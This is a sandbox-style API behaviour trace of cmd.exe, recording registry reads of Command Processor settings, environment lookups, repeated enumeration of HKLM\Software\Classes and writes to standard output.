Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77b20000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x77b36d40	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 24, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT, result_out = $P$G	1	Fn
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Desktop, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\aETAdzjz\Desktop	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77b20000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x77b323d0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x77b28290	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x77b317e0	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Module	Load	module_name = ADVAPI32.dll, base_address = 0x7feff0e0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegEnumKeyW, address_out = 0x7feff0fbf20	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Classes\*\Shell\Open\Command	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 103	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 100	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 124	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 122	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
